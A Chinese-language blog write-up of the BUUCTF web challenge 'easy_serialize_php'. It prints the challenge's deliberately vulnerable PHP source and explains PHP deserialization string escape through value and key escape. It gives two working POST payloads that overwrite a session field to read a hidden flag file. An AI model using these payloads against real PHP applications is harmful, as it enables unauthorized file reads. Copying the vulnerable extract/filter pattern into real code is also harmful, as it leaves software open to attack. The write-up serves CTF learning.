2021-04-01  /2021/04/01/easy-serialize-php/ 99+   4 分钟   0.6 k0次访问

easy_serialize_php

easy_serialize_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

题目是一道关于session的反序列化

先看一下利用点:

1
2
3
4
else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

大概是利用file_get_contents去读取flag文件,题目告诉我们phpinfo里有提示

(然而buu现在直接卡掉含有phpinfo的域名……

https://blog.csdn.net/weixin_30547797/article/details/96985303

可以找到敏感文件:image-20210401133133348

然后就是session的序列化:

image-20210401133204112

extract($_POST);应该是通过post方式覆写变量,而反序列化读取的是$userinfo[‘img’],也就是session[image]中的内容:

1
2
3
4
5
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

如果sha1,则不能再base64解码……若走第一条,内容则是指定的。

1
$serialize_info = filter(serialize($_SESSION));

filter对序列化进行了过滤删除,构造使删除后序列化仍合法,有机会实现覆写:

反序列化的对象逃逸

值逃逸

控制序列化后的某个值为过滤字,过滤后根据规则,后面的字符会被解析进前面的键作为键值

再在后面闭合使其符合序列化语法:

image-20210401135625213

1
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

这样提交后,flagflagflagflagflagflag被消除掉,取而代之的是";s:8:"function";s:1:"a,这样字符串就是合法的,后面img的值也就被覆盖了

键逃逸

image-20210401140644072

image-20210401140450430

1
_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

吃掉的正是对后面值的描述,这样控制好键的字数,就可以精确做到逃逸……大概……

这道题中决定逃逸的是,extract出现在img之前,user、function之后,不能通过直接覆写改变img,只能通过其他键(或构造特殊键),构造其中的键值来实现合法的反序列化字符串覆写,读取我们想要的文件。

……

easy_serialize_php

http://example.com/2021/04/01/easy-serialize-php/

作者

inanb

发布于

2021-04-01

更新于

2021-10-25

许可协议

# 相关文章
  1.CISCN2019-华东南赛区-Double-Secret
  2.津门杯hate_php
  3.津门杯GoOSS
  4.蓝帽杯2021复现
  5.hacker101-2
  6.HarekazeCTF-2019-encode_and_encode
  7.NCTF2019-SQLi
  8.SWPUCTF-2018-SimplePHP
# 推荐文章
  1.Black-Watch-入群题-Web
  2.DDCTF-2019-homebrew event loop
  3.GYCTF2020-EasyThinking
  4.GXYCTF2019-BabysqliV3.0
  5.GYCTF2020-Easyphp
  6.HFCTF2020-JustEscape

喜欢这篇文章?打赏一下作者吧

关注我

:D 一言句子获取中...

链接

最新文章

分类

归档

标签

buuctf29
Buuctf5
PHP2
RCE2
php变量覆盖2
伪协议2
Buuctf PHP代码审计 文件包含1
Buuctf SQL1
Html和css1

订阅更新

×